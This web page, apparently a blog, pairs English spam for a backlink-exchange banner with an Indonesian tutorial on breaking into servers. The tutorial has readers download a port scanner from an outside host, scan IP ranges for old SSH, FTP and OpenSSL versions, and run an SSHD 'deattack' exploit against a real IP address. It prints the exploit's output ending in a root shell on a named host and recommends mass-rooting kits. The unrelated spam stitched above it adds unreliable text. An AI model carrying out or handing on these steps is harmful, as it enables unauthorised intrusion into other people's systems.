Just copy this banner code to your website or blog:This program is a free automatic backlinks exchange services and free web traffic from other users. Everyone knows how important backlinks to get a high pagerank. Here, we offer a backlink for free and very fast for your sites. Copy the html code first, and then paste to your website or blog. To view your backlink you can click the image link from your website or blog. And well... your website url done and will be displaying in last references.
If any visitors click this banner from your website or blog, your url backlink will be creating automatically in this website. Enjoy with this seo tricks.
lebih lanjut... 1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz 2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb. 3. cara penggunaan grabbb : a. ketik ./grabbb maka akan ada help nya b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080 - klo kita scan port 21 maka akan keliatan versi wuftpd - klo kita scan port 22 maka akan keliatan versi ssh - klo kita scan port 443 maka akan keliatan versi openssl
setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya
4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa sebagai contoh pemakaian saya pake x3.tar.gz 5. ./x3 -t 0 SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net) Targets: ( 1) Small - SSH-1.5-1.2.26 ( 2) Small - SSH-1.5-OpenSSH-1.2.3 ( 3) Small - SSH-1.5-1.2.31 ( 4) Small - SSH-1.5-1.3.07 ( 5) Small - SSH-1.99-OpenSSH_2.1.1 ( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH ( 7) Small - SSH-1.5-1.2.27 ( 8) Small - SSH-1.99-OpenSSH_2.2.0p1 ( 9) Big - SSH-1.99-OpenSSH_2.2.0p1 (10) Big - SSH-1.5-1.2.27 (11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST (12) Big - SSH-1.5-1.2.27
6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu 66.1.213.59:22: SSH-1.5-1.2.27
7. kita coba ./x3 -t 7 66.1.213.59 22 . SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Target: Small - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 66.1.213.59:22 Testing if remote sshd is vulnerable # ATTACH NOW
Crash, finding next return address EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 ATTACH NOW Changing MSW of return address to: 0x0807 Crash, finding next return address EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 ATTACH NOW Changing MSW of return address to: 0x0807 Crash, finding next return address EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 ATTACH NOW Changing MSW of return address to: 0x0807 Crash, finding next return address EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02 ATTACH NOW Changing MSW of return address to: 0x0807
********* YOU ARE IN *********
uname -a ; id uname -a ; id Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown uid=48(root) gid=48(root) groups=48(root)
nah itu uah dapat, terserah mau diapakan
keterangan: ngeroot
menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk
memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz
sama saja.
tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain